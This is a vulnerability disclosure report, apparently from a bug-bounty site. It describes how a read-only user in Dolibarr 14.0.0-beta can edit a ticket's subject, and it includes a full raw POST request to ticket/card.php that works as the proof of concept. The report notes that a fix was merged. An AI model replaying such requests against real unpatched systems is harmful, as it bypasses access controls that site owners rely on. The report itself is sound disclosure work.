Improper Handling of Insufficient Privileges in dolibarr/dolibarr

Valid

Reported on

May 22nd 2021


💥 BUG

unprivileged user can modify subject of a ticket

💥 IMPACT

user with read-only permission can modify ticket subject

💥 TESTED VERSION

dolibarr 14.0.0-beta

💥 STEP TO REPRODUCE

1. First goto admin account and add user B as normal user .
Now give user B bellow permission for Ticket module .
-->See tickets.
So, user B can see ticket but cant modify .

2. Now from admin account goto Ticket module and create a ticket .

3. Finally goto user B account and sent bellow request to modify the above ticket subject .

POST /dolibarr-develop/htdocs/ticket/card.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr-develop/htdocs/ticket/card.php?action=editsubject&id=1
Cookie:  DOLSESSID_8e8881ad773ee74880c453666c22c288=kd3isa1fp3c53e419fgn79lilo
Upgrade-Insecure-Requests: 1
ACCOUNT: TEST2

action=setsubject&token=$2y$10$tK..OGNlxaeIvPVQvMXyx.SeRU554JpFLtefFhZpG3vN9NgvfN9qK&id=1&subject=tick12+by_usesssr&modify=Modify

here in this request postdata change id parameter value to ticket id .

Laurent Destailleur confirmed that a fix has been merged on facd6a 2 months ago
Laurent Destailleur has been awarded the fix bounty